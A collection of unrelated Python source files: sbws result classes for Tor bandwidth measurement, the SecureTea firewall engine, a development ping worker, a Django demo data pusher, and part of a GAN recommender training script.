When the RelayPrioritizer encounters this Result, how much should it
adjust its freshness? (See RelayPrioritizer.best_priority() for more
information about "freshness")
A higher factor makes the freshness lower (making the Result seem
older). A lower freshness leads to the relay having better priority,
and better priority means it will be measured again sooner.
The value 0.5 was chosen somewhat arbitrarily, but a few weeks of live
network testing verifies that sbws is still able to perform useful
measurements in a reasonable amount of time.
'''
return 0.5
@property
def msg(self):
return self._msg
@staticmethod
def from_dict(d):
assert isinstance(d, dict)
return ResultError(
Result.Relay(
d['fingerprint'], d['nickname'], d['address'],
d['master_key_ed25519'],
relay_in_recent_consensus_count= # noqa
d.get('relay_in_recent_consensus_count', None), # noqa
relay_recent_measurement_attempt_count= # noqa
d.get('relay_recent_measurement_attempt_count', None), # noqa
relay_recent_priority_list_count= # noqa
d.get('relay_recent_priority_list_count', None), # noqa
),
d['circ'], d['dest_url'], d['scanner'],
msg=d['msg'], t=d['time'])
def to_dict(self):
d = super().to_dict()
d.update({
'msg': self.msg,
})
return d
class ResultErrorCircuit(ResultError):
def __init__(self, *a, **kw):
super().__init__(*a, **kw)
@property
def type(self):
return _ResultType.ErrorCircuit
@property
def freshness_reduction_factor(self):
'''
There are a few instances when it isn't the relay's fault that the
circuit failed to get built. Maybe someday we'll try detecting whose
fault it most likely was and subclassing ResultErrorCircuit. But for
now we don't. So reduce the freshness slightly more than ResultError
does by default so priority isn't hurt quite as much.
A (hopefully very very rare) example of when a circuit would fail to
get built is when the sbws client machine suddenly loses Internet
access.
'''
return 0.6
@staticmethod
def from_dict(d):
assert isinstance(d, dict)
return ResultErrorCircuit(
Result.Relay(
d['fingerprint'], d['nickname'], d['address'],
d['master_key_ed25519'],
relay_in_recent_consensus_count= # noqa
d.get('relay_in_recent_consensus_count', None), # noqa
relay_recent_measurement_attempt_count= # noqa
d.get('relay_recent_measurement_attempt_count', None), # noqa
relay_recent_priority_list_count= # noqa
d.get('relay_recent_priority_list_count', None), # noqa
),
d['circ'], d['dest_url'], d['scanner'],
msg=d['msg'], t=d['time'])
def to_dict(self):
d = super().to_dict()
return d
class ResultErrorStream(ResultError):
def __init__(self, *a, **kw):
super().__init__(*a, **kw)
@property
def type(self):
return _ResultType.ErrorStream
@staticmethod
def from_dict(d):
assert isinstance(d, dict)
return ResultErrorStream(
Result.Relay(
d['fingerprint'], d['nickname'], d['address'],
d['master_key_ed25519'],
relay_in_recent_consensus_count= # noqa
d.get('relay_in_recent_consensus_count', None), # noqa
relay_recent_measurement_attempt_count= # noqa
d.get('relay_recent_measurement_attempt_count', None), # noqa
relay_recent_priority_list_count= # noqa
d.get('relay_recent_priority_list_count', None), # noqa
),
d['circ'], d['dest_url'], d['scanner'],
msg=d['msg'], t=d['time'])
def to_dict(self):
d = super().to_dict()
return d
class ResultErrorSecondRelay(ResultError):
"""
Error when it could not be found a second relay suitable to measure
a relay.
A second suitable relay is a relay that:
- Has at least equal bandwidth as the relay to measure.
- If the relay to measure is not an exit,
the second relay is an exit without `bad` flag and can exit to port 443.
- If the relay to measure is an exit, the second relay is not an exit.
It is instanciated in :func:`~sbws.core.scanner.measure_relay`.
.. note:: this duplicates code and add more tech-debt,
since it's the same as the other
:class:`~sbws.lib.resultdump.ResultError` classes except for the
``type``.
In a future refactor, there should be only one ``ResultError`` class
and assign the type in the ``scanner`` module.
"""
def __init__(self, *a, **kw):
super().__init__(*a, **kw)
@property
def type(self):
return _ResultType.ErrorSecondRelay
@staticmethod
def from_dict(d):
assert isinstance(d, dict)
return ResultErrorSecondRelay(
Result.Relay(
d['fingerprint'], d['nickname'], d['address'],
d['master_key_ed25519']),
d['circ'], d['dest_url'], d['scanner'],
msg=d['msg'], t=d['time'])
def to_dict(self):
d = super().to_dict()
return d
class ResultErrorDestination(ResultError):
"""
Error when there is not a working destination Web Server.
It is instanciated in :func:`~sbws.core.scanner.measure_relay`.
.. note:: this duplicates code and add more tech-debt,
since it's the same as the other
:class:`~sbws.lib.resultdump.ResultError` classes except for the
``type``.
In a future refactor, there should be only one ``ResultError`` class
and assign the type in the ``scanner`` module.
"""
def __init__(self, *a, **kw):
super().__init__(*a, **kw)
@property
def type(self):
return _ResultType.ErrorSecondRelay
@staticmethod
def from_dict(d):
assert isinstance(d, dict)
return ResultErrorSecondRelay(
Result.Relay(
d['fingerprint'], d['nickname'], d['address'],
d['master_key_ed25519']),
d['circ'], d['dest_url'], d['scanner'],
msg=d['msg'], t=d['time'])
def to_dict(self):
d = super().to_dict()
return d
class ResultErrorAuth(ResultError):
def __init__(self, *a, **kw):
super().__init__(*a, **kw)
@property
def type(self):
return _ResultType.ErrorAuth
@property
def freshness_reduction_factor(self):
'''
Override the default ResultError.freshness_reduction_factor because a
ResultErrorAuth is most likely not the measured relay's fault, so we
shouldn't hurt its priority as much. A higher reduction factor means a
Result's effective freshness is reduced more, which makes the relay's
priority better.
The value 0.9 was chosen somewhat arbitrarily.
'''
return 0.9
@staticmethod
def from_dict(d):
assert isinstance(d, dict)
return ResultErrorAuth(
Result.Relay(
d['fingerprint'], d['nickname'], d['address'],
d['master_key_ed25519'],
relay_in_recent_consensus_count= # noqa
d.get('relay_in_recent_consensus_count', None), # noqa
relay_recent_measurement_attempt_count= # noqa
d.get('relay_recent_measurement_attempt_count', None), # noqa
relay_recent_priority_list_count= # noqa
d.get('relay_recent_priority_list_count', None), # noqa
),
d['circ'], d['dest_url'], d['scanner'],
msg=d['msg'], t=d['time'])
def to_dict(self):
d = super().to_dict()
return d
class ResultSuccess(Result):
def __init__(self, rtts, downloads, *a, **kw):
super().__init__(*a, **kw)
self._rtts = rtts
self._downloads = downloads
@property
def type(self):
return _ResultType.Success
@property
def rtts(self):
return self._rtts
@property
def downloads(self):
return self._downloads
@staticmethod
def from_dict(d):
assert isinstance(d, dict)
return ResultSuccess(
d['rtts'] or [], d['downloads'],
Result.Relay(
d['fingerprint'], d['nickname'], d['address'],
d['master_key_ed25519'], d['relay_average_bandwidth'],
d.get('relay_burst_bandwidth'), d['relay_observed_bandwidth'],
d.get('consensus_bandwidth'),
d.get('consensus_bandwidth_is_unmeasured'),
relay_in_recent_consensus_count= # noqa
d.get('relay_in_recent_consensus_count', None), # noqa
relay_recent_measurement_attempt_count= # noqa
d.get('relay_recent_measurement_attempt_count', None), # noqa
relay_recent_priority_list_count= # noqa
d.get('relay_recent_priority_list_count', None), # noqa
),
d['circ'], d['dest_url'], d['scanner'],
t=d['time'])
def to_dict(self):
d = super().to_dict()
d.update({
'rtts': self.rtts,
'downloads': self.downloads,
'relay_average_bandwidth': self.relay_average_bandwidth,
'relay_burst_bandwidth': self.relay_burst_bandwidth,
'relay_observed_bandwidth': self.relay_observed_bandwidth,
'consensus_bandwidth': self.consensus_bandwidth,
'consensus_bandwidth_is_unmeasured':
self.consensus_bandwidth_is_unmeasured,
})
return d
class ResultDump:
''' Runs the enter() method in a new thread and collects new Results on its
queue. Writes them to daily result files in the data directory '''
def __init__(self, args, conf):
assert os.path.isdir(conf.getpath('paths', 'datadir'))
self.conf = conf
self.fresh_days = conf.getint('general', 'data_period')
self.datadir = conf.getpath('paths', 'datadir')
self.data = {}
self.data_lock = RLock()
self.thread = Thread(target=self.enter)
self.queue = Queue()
try:
self.thread.start()
except RuntimeError as e:
fail_hard(e)
def store_result(self, result):
''' Call from ResultDump thread '''
assert isinstance(result, Result)
with self.data_lock:
fp = result.fingerprint
if fp not in self.data:
self.data[fp] = []
self.data[fp].append(result)
self.data = trim_results(self.fresh_days, self.data)
# Not calling trim_results_ip_changed here to do not remove
# the results for a relay that has changed address.
# It will be called when loading the results to generate a v3bw
# file.
def handle_result(self, result):
''' Call from ResultDump thread. If we are shutting down, ignores
ResultError* types '''
assert isinstance(result, Result)
fp = result.fingerprint
nick = result.nickname
if isinstance(result, ResultError) and settings.end_event.is_set():
log.debug('Ignoring %s for %s %s because we are shutting down',
type(result).__name__, nick, fp)
return
self.store_result(result)
write_result_to_datadir(result, self.datadir)
if result.type == "success":
msg = "Success measuring {} ({}) via circuit {} and " \
"destination {}".format(
result.fingerprint, result.nickname, result.circ,
result.dest_url)
else:
msg = "Error measuring {} ({}) via circuit {} and " \
"destination {}: {}".format(
result.fingerprint, result.nickname, result.circ,
result.dest_url, result.msg)
log.info(msg)
def enter(self):
"""Main loop for the ResultDump thread.
When there are results in the queue, queue.get will get them until
there are not anymore or timeout happen.
For every result it gets, it process it and store in the filesystem,
which takes ~1 millisecond and will not trigger the timeout.
It can then store in the filesystem ~1000 results per second.
I does not accept any other data type than Results or list of Results,
therefore is not possible to put big data types in the queue.
If there are not any results in the queue, it waits 1 second and checks
again.
"""
with self.data_lock:
self.data = load_recent_results_in_datadir(
self.fresh_days, self.datadir)
while not (settings.end_event.is_set() and self.queue.empty()):
try:
event = self.queue.get(timeout=1)
except Empty:
continue
data = event
if data is None:
log.debug('Got None in ResultDump')
continue
elif isinstance(data, list):
for r in data:
assert isinstance(r, Result)
self.handle_result(r)
elif isinstance(data, Result):
self.handle_result(data)
else:
log.warning('The only thing we should ever receive in the '
'result thread is a Result or list of Results. '
'Ignoring %s', type(data))
def results_for_relay(self, relay):
assert isinstance(relay, Relay)
fp = relay.fingerprint
with self.data_lock:
if fp not in self.data:
return []
return self.data[fp]
|
engine.py
|
# -*- coding: utf-8 -*-
u"""Firewall-Engine module for SecureTea Firewall.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Author: Abhishek Sharma <abhishek_official@hotmail.com> , Feb 12 2019
Version: 1.1
Module: SecureTea
"""
import datetime
from securetea import logger
import multiprocessing
import netfilterqueue
from securetea.lib.firewall.packet_filter import PacketFilter
from securetea.lib.firewall.firewall_monitor import FirewallMonitor
from securetea.lib.firewall import utils
class FirewallEngine(object):
"""Class for FirewallEngine.
Working:
Perform all the heavy lifting and parsing.
Call PacketFilter and Monitor.
"""
def __init__(self, cred, debug=False):
"""Initialize FirewallEngine."""
self.cred = cred
self.logger = logger.SecureTeaLogger(
__name__,
debug
)
# Parse and setup rules and actions
(self.ip_inbound,
self.action_inbound_IPRule) = self.parse_inbound_IPRule()
(self.ip_outbound,
self.action_outbound_IPRule) = self.parse_outbound_IPRule()
(self.protocols,
self.action_protocolRule) = self.parse_protocolRule()
(self.sports,
self.action_source_portRule) = self.parse_source_portRule()
(self.dports,
self.action_dest_portRule) = self.parse_dest_portRule()
(self.dns,
self.action_DNSRule) = self.parse_DNSRule()
(self.extensions,
self.action_scanLoad) = self.parse_scanLoad()
self.action_HTTPRequest = self.parse_HTTPRequest()
self.action_HTTPResponse = self.parse_HTTPResponse()
# Interface
self.interface = str(self.cred['interface'])
if self.interface == "":
self.interface = utils.get_interface()
# Setup PacketFilter object
self.packetFilterObj = PacketFilter(interface=self.interface,
debug=debug,
ip_inbound=self.ip_inbound,
ip_outbound=self.ip_outbound,
protocols=self.protocols,
dns=self.dns,
dports=self.dports,
sports=self.sports,
extensions=self.extensions,
action_inbound_IPRule=self.action_inbound_IPRule,
action_outbound_IPRule=self.action_outbound_IPRule,
action_DNSRule=self.action_DNSRule,
action_source_portRule=self.action_source_portRule,
action_dest_portRule=self.action_dest_portRule,
action_HTTPResponse=self.action_HTTPResponse,
action_HTTPRequest=self.action_HTTPRequest,
action_protocolRule=self.action_protocolRule,
action_scanLoad=self.action_scanLoad)
# Setup Montior object
self.monitorObj = FirewallMonitor(interface=self.interface,
debug=debug)
# Integrations
self.integrations = ['Firewall',
'Monitor']
@staticmethod
def restore_state():
"""
Restore the iptables state.
Args:
None
Raises:
None
Returns:
None
"""
resp = utils.excecute_command('iptables --flush')
if resp[1]:
self.logger.log(
resp[1],
logtype="error"
)
def parse_inbound_IPRule(self):
"""
Parse the inbound IP rules and
generate ip_inbound list.
Args:
None
Raises:
None
Returns:
temp_ip_inbound (list): Parsed IP inbound list
action (int): 0 or 1
"""
try:
action = int(self.cred['inbound_IPRule']['action'])
temp_ip_inbound = []
if len(self.cred['inbound_IPRule']['ip_inbound']):
list_of_IPs = str(self.cred['inbound_IPRule']['ip_inbound'])
list_of_IPs = list_of_IPs.split(',')
for IP in list_of_IPs:
if '-' in IP:
for new_ip in utils.generate_IPs(IP):
if (new_ip not in temp_ip_inbound and
utils.check_ip(new_ip)):
temp_ip_inbound.append(str(new_ip).strip())
elif (utils.check_ip(IP)):
if IP not in temp_ip_inbound:
temp_ip_inbound.append(str(IP).strip())
return temp_ip_inbound, action
except Exception as e:
self.logger.log(
"Error: " + str(e),
logtype="error"
)
# Return empty list and block action
return [], 0
def parse_outbound_IPRule(self):
"""
Parse the outbound IP rules and
generate ip_outbound list.
Args:
None
Raises:
None
Returns:
temp_ip_outbound (list): Parsed IP outbound list
action (int): 0 or 1
"""
try:
action = int(self.cred['outbound_IPRule']['action'])
temp_ip_outbound = []
if len(self.cred['outbound_IPRule']['ip_outbound']):
list_of_IPs = str(self.cred['outbound_IPRule']['ip_outbound'])
list_of_IPs = list_of_IPs.split(',')
for IP in list_of_IPs:
if '-' in IP:
for new_ip in utils.generate_IPs(IP):
if (new_ip not in temp_ip_outbound and
utils.check_ip(new_ip)):
temp_ip_outbound.append(str(new_ip).strip())
elif (utils.check_ip(IP)):
if IP not in temp_ip_outbound:
temp_ip_outbound.append(str(IP).strip())
return temp_ip_outbound, action
except Exception as e:
self.logger.log(
"Error: " + str(e),
logtype="error"
)
# Return empty list and block action
return [], 0
def parse_protocolRule(self):
"""
Parse the protocol configurations passed.
Args:
None
Raises:
None
Returns:
temp_protocol (list): Parsed protocol list
action (int): 0 or 1
"""
try:
temp_protocol = []
action = int(self.cred['protocolRule']['action'])
if len(self.cred['protocolRule']['protocols']):
protocols = str(self.cred['protocolRule']['protocols'])
protocols = protocols.split(',')
protocols = map(utils.map_protocol, protocols)
protocols = list(protocols)
for protocol in protocols:
if (protocol and
protocol not in temp_protocol):
temp_protocol.append(protocol)
return temp_protocol, action
except Exception as e:
self.logger.log(
"Error: " + str(e),
logtype="error"
)
# Return empty list and block action
return [], 0
def parse_DNSRule(self):
"""
Parse the DNS configurations passed.
Args:
None
Raises:
None
Returns:
temp_DNS (list): Parsed DNS list
action (int): 0 or 1
"""
try:
temp_DNS = []
action = int(self.cred['DNSRule']['action'])
if len(self.cred['DNSRule']['dns']):
dns = str(self.cred['DNSRule']['dns'])
dns = dns.split(',')
for single_dns in dns:
if single_dns not in temp_DNS:
temp_DNS.append(str(single_dns).strip())
return temp_DNS, action
except Exception as e:
self.logger.log(
"Error: " + str(e),
logtype="error"
)
# Return empty list and block action
return [], 0
def parse_source_portRule(self):
"""
Parse the source port rules passed and
generate source ports list.
Args:
None
Raises:
None
Returns:
temp_sports (list): Parsed list of source ports
action (int): 0 or 1
"""
try:
temp_sports = []
action = int(self.cred['source_portRule']['action'])
if len(self.cred['source_portRule']['sports']):
sports = str(self.cred['source_portRule']['sports'])
sports = sports.split(',')
for port in sports:
if '-' in port:
for new_port in utils.generate_ports(port):
if (new_port not in temp_sports and
utils.check_port(new_port)):
temp_sports.append(str(new_port).strip())
elif utils.check_port(port):
if port not in temp_sports:
temp_sports.append(str(port).strip())
return temp_sports, action
except Exception as e:
self.logger.log(
"Error: " + str(e),
logtype="error"
)
# Return empty list and block action
return [], 0
def parse_dest_portRule(self):
"""
Parse the destination port rules passed and
generate destination ports list.
Args:
None
Raises:
None
Returns:
temp_dports (list): Parsed list of destination ports
action (int): 0 or 1
"""
try:
temp_dports = []
action = int(self.cred['dest_portRule']['action'])
if len(self.cred['dest_portRule']['dports']):
dports = str(self.cred['dest_portRule']['dports'])
dports = dports.split(',')
for port in dports:
if '-' in port:
for new_port in utils.generate_ports(port):
if (new_port not in temp_dports and
utils.check_port(new_port)):
temp_dports.append(str(new_port).strip())
elif utils.check_port(port):
if port not in temp_dports:
temp_dports.append(str(port).strip())
return temp_dports, action
except Exception as e:
self.logger.log(
"Error: " + str(e),
logtype="error"
)
# Return empty list and block action
return [], 0
def parse_HTTPResponse(self):
"""
Parse HTTPResponse configurations.
Args:
None
Raises:
None
Returns:
action (int): 0 or 1
"""
try:
action = int(self.cred['HTTPResponse']['action'])
return action
except Exception as e:
self.logger.log(
"Error: " + str(e),
logtype="error"
)
# Allow HTTPResponse
return 1
def parse_HTTPRequest(self):
"""
Parse HTTPRequest configurations.
Args:
None
Raises:
None
Returns:
action (int): 0 or 1
"""
try:
action = int(self.cred['HTTPRequest']['action'])
return action
except Exception as e:
self.logger.log(
"Error: " + str(e),
logtype="error"
)
# Allow HTTPRequest
return 1
def parse_scanLoad(self):
"""
Parse scan load configurations.
Args:
None
Raises:
None
Returns:
temp_extension (list): Parsed extension list
action (int): 0 or 1
"""
try:
temp_extension = []
action = int(self.cred['scanLoad']['action'])
if len(self.cred['scanLoad']['extensions']):
extensions = str(self.cred['scanLoad']['extensions'])
extensions = extensions.split(',')
for extension in extensions:
if extension not in temp_extension:
temp_extension.append(str(extension).strip())
return temp_extension, action
except Exception as e:
self.logger.log(
"Error: " + str(e),
logtype="error"
)
# Return empty list and block action
return [], 0
def parse_time(self):
"""
Parses the time passed and checks
with the current time.
Args:
None
Raises:
None
Returns:
bool
"""
try:
current_time = datetime.datetime.now()
time_lb = self.cred['time']['time_lb']
time_ub = self.cred['time']['time_ub']
datetime_lb = current_time.replace(hour=int((time_lb).split(':')[0]),
minute=int((time_lb).split(':')[1]))
datetime_ub = current_time.replace(hour=int((time_ub).split(':')[0]),
minute=int((time_ub).split(':')[1]))
if (current_time > datetime_lb and
current_time < datetime_ub):
return True
else:
return False
except Exception as e:
self.logger.log(
"Error: " + str(e),
logtype="error"
)
def process_packet(self, pkt):
"""
Process the packet passed to the PacketFilter.
If the current CPU time matches the time rule and
the packet satisfies the packet filter rules,
allow the packet, else drop the packet.
Args:
None
Raises:
None
Returns:
None
"""
if (self.packetFilterObj.process(pkt) and
self.parse_time):
pkt.accept()
else:
pkt.drop()
def startFirewall(self):
"""
Setup netfilterqueue and start
processing packets in the queue.
Args:
None
Raises:
None
Returns:
None
"""
input_command = 'iptables -I INPUT -j NFQUEUE --queue-num 0'
output_command = 'iptables -I OUTPUT -j NFQUEUE --queue-num 0'
resp = utils.excecute_command(input_command)
if resp[1]:
self.logger.log(
resp[1],
logtype="error"
)
resp = utils.excecute_command(output_command)
if resp[1]:
self.logger.log(
resp[1],
logtype="error"
)
try:
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, self.process_packet)
queue.run()
except KeyboardInterrupt:
# Restore iptables state
self.restore_state()
def startMonitor(self):
"""
Start the montior engine.
Args:
None
Raises:
None
Returns:
None
"""
self.monitorObj.startMonitoring()
def startEngine(self):
"""
Start the FirewallEngine.
Working:
Spin two process, one for core firewall engine
and other for monitoring services.
Args:
None
Raises:
None
Returns:
None
"""
processes = []
firewallProcess = multiprocessing.Process(target=self.startFirewall)
monitorProcess = multiprocessing.Process(target=self.startMonitor)
firewallProcess.start()
monitorProcess.start()
processes.append(firewallProcess)
processes.append(monitorProcess)
self.logger.log(
"Integrations: " + str(self.integrations),
logtype="info"
)
for process in processes:
process.join()
|
worker.py
|
import attr
from threading import Thread, Event
from time import time
from ....config import deferred_config
from ....backend_interface.task.development.stop_signal import TaskStopSignal
from ....backend_api.services import tasks
class DevWorker(object):
prefix = attr.ib(type=str, default="MANUAL:")
report_stdout = deferred_config('development.worker.log_stdout', True)
report_period = deferred_config(
'development.worker.report_period_sec', 30.,
transform=lambda x: float(max(x, 1.0)))
ping_period = deferred_config(
'development.worker.ping_period_sec', 30.,
transform=lambda x: float(max(x, 1.0)))
def __init__(self):
self._dev_stop_signal = None
self._thread = None
self._exit_event = Event()
self._task = None
self._support_ping = False
def ping(self, timestamp=None):
try:
if self._task:
self._task.send(tasks.PingRequest(self._task.id))
except Exception:
return False
return True
def register(self, task, stop_signal_support=None):
if self._thread:
return True
if (stop_signal_support is None and TaskStopSignal.enabled) or stop_signal_support is True:
self._dev_stop_signal = TaskStopSignal(task=task)
self._support_ping = hasattr(tasks, 'PingRequest')
# if there is nothing to monitor, leave
if not self._support_ping and not self._dev_stop_signal:
return
self._task = task
self._exit_event.clear()
self._thread = Thread(target=self._daemon)
self._thread.daemon = True
self._thread.start()
return True
def _daemon(self):
last_ping = time()
while self._task is not None:
try:
if self._exit_event.wait(min(self.ping_period, self.report_period)):
return
# send ping request
if self._support_ping and (time() - last_ping) >= self.ping_period:
self.ping()
last_ping = time()
if self._dev_stop_signal:
stop_reason = self._dev_stop_signal.test()
if stop_reason and self._task:
self._task._dev_mode_stop_task(stop_reason)
except Exception:
pass
def unregister(self):
self._dev_stop_signal = None
self._task = None
self._thread = None
self._exit_event.set()
return True
|
demo_dp_interface.py
|
import logging
from time import sleep
from random import random
from threading import Thread
from datetime import datetime, timezone
logger = logging.getLogger(__name__)
class DemoDPInterface():
"""
This is a demo version of a datapoint interface which pushes dummy values
and metadata into the DB to support the EMP Demo UI App.
"""
def __new__(cls, *args, **kwargs):
"""
Ensure singleton, i.e. only one instance is created.
"""
if not hasattr(cls, "_instance"):
# This magically calls __init__ with the correct arguements too.
cls._instance = object.__new__(cls)
else:
logger.warning(
"ConnectorMQTTIntegration is aldready running. Use "
"get_instance method to retrieve the running instance."
)
return cls._instance
@classmethod
def get_instance(cls):
"""
Return the running instance of the class.
Returns:
--------
instance: EMPAppsCache instance
The running instance of the class. Is none of not running yet.
"""
if hasattr(cls, "_instance"):
instance = cls._instance
else:
instance = None
return instance
def __init__(self):
"""
Spin off a thread to simulate asynchronous arrival of data.
"""
# This will be called twice on "./manage.py runserver" by django.
# At the first time we wish to run this function, the second time not.
if not hasattr(self, "_is_initialized"):
# Logging useful information about the background workers seems to
# be a good idea, even it is only a debug message.
logger.info("Starting DemoDPInterface.")
# This must be a thread as the save method of Datapoint spawns a
# signal. This signal is only received if sender and
# receiver live in the same process.
self.thread = Thread(target=self.push_data)
# Don't wait on this thread on shutdown.
self.thread.daemon = True
self.thread.start()
self._is_initialized = True
def push_data(self):
"""
Push fake values to Datapoint in DB for demo purposes.
"""
# Give the remaining components some time to spin up.
sleep(10)
# This can only be loaded once all apps are initialized.
from emp_main.models import Datapoint
# Updateing/Inserting metadata for a datapoint could look like this:
dp, created = Datapoint.objects.get_or_create(
external_id=1,
type="sensor"
)
dp.data_format = "continuous_numeric"
dp.description = "A dummy temperature like datapoint."
dp.min_value = 19.0
dp.max_value = 25.0
dp.unit = "°C"
dp.save()
while True:
# Generate a random value in the range of a typical temperature
value = round(22 + random() * 3, 1)
timestamp_as_dt = datetime.utcnow().astimezone(timezone.utc)
# Updateing the value for an existing datapoint could look like
# this. Specifingy update_fields is good practice and allows
# methods listening to the save signals to determine if relevant
# information has been updated.
# Please ensure that the new values match the fields. E.g.
# last_value is string field but will also accept a number. However
# the methods listening to post_save (e.g. consumers notifing the
# user about new data) will expect a string.
dp = Datapoint.objects.get(external_id=1)
dp.last_value = str(value)
dp.last_value_timestamp = timestamp_as_dt
dp.save(update_fields=["last_value", "last_value_timestamp"])
sleep(5)
|
main_gan_L2_regularized_yelp.py
|
import datetime
import numpy as np
import tensorflow as tf
import threading
import os
from ganrl.common.cmd_args import cmd_args
from ganrl.experiment_user_model.data_utils import Dataset
from ganrl.experiment_user_model.utils import UserModelLSTM, UserModelPW
def multithread_compute_vali():
global vali_sum, vali_cnt
vali_sum = [0.0, 0.0, 0.0, 0.0]
vali_cnt = 0
threads = []
for ii in xrange(cmd_args.num_thread):
thread = threading.Thread(target=vali_eval, args=(1, ii))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
return vali_sum[0]/vali_cnt, vali_sum[1]/vali_cnt, vali_sum[2]/vali_cnt, vali_sum[3]/vali_cnt
def vali_eval(xx, ii):
global vali_sum, vali_cnt
vali_thread_eval = sess.run([train_loss_min_sum, train_loss_max_sum, train_prec1_sum, train_prec2_sum, train_event_cnt],
feed_dict={user_model.placeholder['clicked_feature']: click_feature_vali[ii],
user_model.placeholder['ut_dispid_feature']: u_t_dispid_feature_vali[ii],
user_model.placeholder['ut_dispid_ut']: np.array(u_t_dispid_split_ut_vali[ii], dtype=np.int64),
user_model.placeholder['ut_dispid']: np.array(u_t_dispid_vali[ii], dtype=np.int64),
user_model.placeholder['ut_clickid']: np.array(u_t_clickid_vali[ii], dtype=np.int64),
user_model.placeholder['ut_clickid_val']: np.ones(len(u_t_clickid_vali[ii]), dtype=np.float32),
user_model.placeholder['click_sublist_index']: np.array(click_sub_index_vali[ii], dtype=np.int64),
user_model.placeholder['ut_dense']: ut_dense_vali[ii],
user_model.placeholder['time']: max_time_vali[ii],
user_model.placeholder['item_size']: news_cnt_short_vali[ii]
})
lock.acquire()
vali_sum[0] += vali_thread_eval[0]
vali_sum[1] += vali_thread_eval[1]
vali_sum[2] += vali_thread_eval[2]
vali_sum[3] += vali_thread_eval[3]
vali_cnt += vali_thread_eval[4]
lock.release()
def multithread_compute_test():
global test_sum, test_cnt
num_sets = cmd_args.num_thread
thread_dist = [[] for _ in xrange(cmd_args.num_thread)]
for ii in xrange(num_sets):
thread_dist[ii % cmd_args.num_thread].append(ii)
test_sum = [0.0, 0.0, 0.0, 0.0]
test_cnt = 0
threads = []
for ii in xrange(cmd_args.num_thread):
thread = threading.Thread(target=test_eval, args=(1, thread_dist[ii]))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
return test_sum[0]/test_cnt, test_sum[1]/test_cnt, test_sum[2]/test_cnt, test_sum[3]/test_cnt
def test_eval(xx, thread_dist):
global test_sum, test_cnt
test_thread_eval = [0.0, 0.0, 0.0, 0.0]
test_thread_cnt = 0
for ii in thread_dist:
test_set_eval = sess.run([train_loss_min_sum, train_loss_max_sum, train_prec1_sum, train_prec2_sum, train_event_cnt],
feed_dict={user_model.placeholder['clicked_feature']: click_feature_test[ii],
user_model.placeholder['ut_dispid_feature']: u_t_dispid_feature_test[ii],
user_model.placeholder['ut_dispid_ut']: np.array(u_t_dispid_split_ut_test[ii], dtype=np.int64),
user_model.placeholder['ut_dispid']: np.array(u_t_dispid_test[ii], dtype=np.int64),
user_model.placeholder['ut_clickid']: np.array(u_t_clickid_test[ii], dtype=np.int64),
user_model.placeholder['ut_clickid_val']: np.ones(len(u_t_clickid_test[ii]), dtype=np.float32),
user_model.placeholder['click_sublist_index']: np.array(click_sub_index_test[ii], dtype=np.int64),
user_model.placeholder['ut_dense']: ut_dense_test[ii],
user_model.placeholder['time']: max_time_test[ii],
user_model.placeholder['item_size']: news_cnt_short_test[ii]
})
test_thread_eval[0] += test_set_eval[0]
test_thread_eval[1] += test_set_eval[1]
test_thread_eval[2] += test_set_eval[2]
test_thread_eval[3] += test_set_eval[3]
test_thread_cnt += test_set_eval[4]
lock.acquire()
test_sum[0] += test_thread_eval[0]
test_sum[1] += test_thread_eval[1]
test_sum[2] += test_thread_eval[2]
test_sum[3] += test_thread_eval[3]
test_cnt += test_thread_cnt
lock.release()
lock = threading.Lock()
if __name__ == '__main__':
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start" % log_time)
dataset = Dataset(cmd_args)
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start construct graph" % log_time)
# restore pre-trained u function
user_model = UserModelLSTM(dataset.f_dim, cmd_args, dataset.max_disp_size)
user_model.construct_placeholder()
with tf.variable_scope('model', reuse=False):
user_model.construct_computation_graph_u()
saved_path = cmd_args.save_dir+'/'
saver = tf.train.Saver(max_to_keep=None)
sess = tf.Session()
sess.run(tf.variables_initializer(user_model.min_trainable_variables))
best_save_path = os.path.join(saved_path, 'best-pre1')
saver.restore(sess, best_save_path)
# construct policy net
train_min_opt, train_max_opt, train_loss_min, train_loss_max, train_prec1, train_prec2, train_loss_min_sum, \
train_loss_max_sum, train_prec1_sum, train_prec2_sum, train_event_cnt = user_model.construct_computation_graph_policy()
sess.run(tf.initialize_variables(user_model.init_variables))
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, graph completed" % log_time)
batch_size = 100
batch = 100
if cmd_args.dataset == 'lastfm':
batch_size = 10
batch = 10
iterations = cmd_args.num_itrs
# prepare validation data
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start prepare vali data" % log_time)
vali_thread_user, size_user_vali, max_time_vali, news_cnt_short_vali, u_t_dispid_vali, \
u_t_dispid_split_ut_vali, u_t_dispid_feature_vali, click_feature_vali, click_sub_index_vali, \
u_t_clickid_vali, ut_dense_vali = dataset.prepare_validation_data_L2(cmd_args.num_thread, dataset.vali_user)
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, prepare vali data complete" % log_time)
best_metric = [0.0, 0.0, 0.0, 0.0]
saver = tf.train.Saver(max_to_keep=None)
vali_path = cmd_args.save_dir+'/minmax_L2/'
if not os.path.exists(vali_path):
os.makedirs(vali_path)
for i in xrange(iterations):
training_user = np.random.choice(len(dataset.train_user), batch, replace=False)
if i == 0:
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start prepare train data" % log_time)
size_user_tr, max_time_tr, news_cnt_short_tr, u_t_dispid_tr, u_t_dispid_split_ut_tr, \
u_t_dispid_feature_tr, click_feature_tr, click_sub_index_tr, u_t_clickid_tr, ut_dense_tr = dataset.data_process_for_placeholder_L2(training_user)
if i == 0:
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, prepare train data completed" % log_time)
print("%s, start first iteration training" % log_time)
sess.run(train_max_opt, feed_dict={user_model.placeholder['clicked_feature']: click_feature_tr,
